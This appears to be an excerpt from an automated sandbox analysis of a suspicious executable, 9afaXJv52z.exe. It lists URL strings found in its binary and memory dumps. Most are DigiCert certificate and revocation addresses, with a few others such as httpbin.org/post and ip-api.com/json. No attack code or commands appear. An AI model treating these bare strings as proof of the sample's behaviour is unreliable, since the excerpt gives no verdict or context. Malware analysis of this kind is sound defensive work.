Source: 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 9afaXJv52z.exe, 00000000.00000003.1249086752.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249492871.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249717286.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250272952.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244115829.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244442453.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1251123271.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244934313.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244562675.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245025869.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250812728.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245362425.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244016171.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245140379.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244644310.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244334483.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245247870.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249826162.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245483808.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: 9afaXJv52z.exe, 00000000.00000003.1249086752.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249492871.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249717286.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250272952.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244115829.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244442453.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1251123271.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244934313.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244562675.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245025869.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250812728.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245362425.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244016171.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245140379.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244644310.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244334483.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245247870.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249826162.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245483808.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 9afaXJv52z.exe, 00000000.00000003.1249086752.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249492871.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249717286.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250272952.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244115829.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244442453.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1251123271.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244934313.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244562675.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245025869.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250812728.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245362425.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08F2000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244016171.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245483808.00000170C08F0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245140379.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244644310.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08F0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244334483.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 0000003D.00000002.2504316046.000001B6AE200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: 9afaXJv52z.exe, 00000000.00000003.1249086752.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249492871.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249717286.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250272952.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244115829.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244442453.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1251123271.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244934313.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244562675.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245025869.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250812728.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245362425.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08F2000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244016171.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245483808.00000170C08F0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245140379.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244644310.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08F0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244334483.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08F2000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 9afaXJv52z.exe, 00000000.00000003.1249086752.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249492871.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249717286.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250272952.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244115829.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244442453.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1251123271.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244934313.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244562675.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245025869.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250812728.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245362425.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244016171.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245140379.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244644310.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244334483.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245247870.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249826162.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245483808.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: 9afaXJv52z.exe, 00000000.00000003.1249086752.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249492871.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249717286.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250272952.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244115829.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244442453.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1251123271.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244934313.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244562675.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245025869.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250812728.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245362425.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244016171.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245140379.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244644310.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244334483.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245247870.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249826162.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245483808.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: select.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08F2000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digice
Source: 9afaXJv52z.exe, 00000000.00000003.1245025869.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCer
Source: 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08F2000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 9afaXJv52z.exe, 00000000.00000003.1249086752.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249492871.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249717286.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250272952.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244115829.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244442453.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1251123271.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244934313.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244562675.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245025869.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250812728.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245362425.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244016171.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245140379.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244644310.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244334483.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245247870.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249826162.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245483808.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 9afaXJv52z.exe, 00000002.00000002.1570103074.0000020DADA70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
Source: edb.log.61.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: 9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADE66000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1555260305.0000020DADE73000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1570923303.0000020DADE73000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548074284.0000020DADE73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://httpbin.org/post
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json
Source: 9afaXJv52z.exe, 00000002.00000003.1549987255.0000020DAD9A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://json.org
Source: 9afaXJv52z.exe, 00000000.00000003.1249086752.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249492871.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249717286.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250272952.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244115829.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244442453.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1251123271.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244934313.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244562675.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245025869.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250812728.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245362425.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244016171.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245140379.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244644310.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244334483.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245247870.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249826162.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245483808.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 9afaXJv52z.exe, 00000000.00000003.1249086752.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249492871.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249717286.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250272952.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244115829.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244442453.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1251123271.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244934313.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244562675.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245025869.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250812728.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245362425.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08F2000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244016171.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245483808.00000170C08F0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245140379.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244644310.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08F0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244334483.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: 9afaXJv52z.exe, 00000000.00000003.1249086752.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249492871.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249717286.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250272952.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244115829.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244442453.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1251123271.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244934313.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244562675.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245025869.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250812728.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245362425.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08F2000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08F2000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244016171.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245483808.00000170C08F0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245140379.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244644310.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
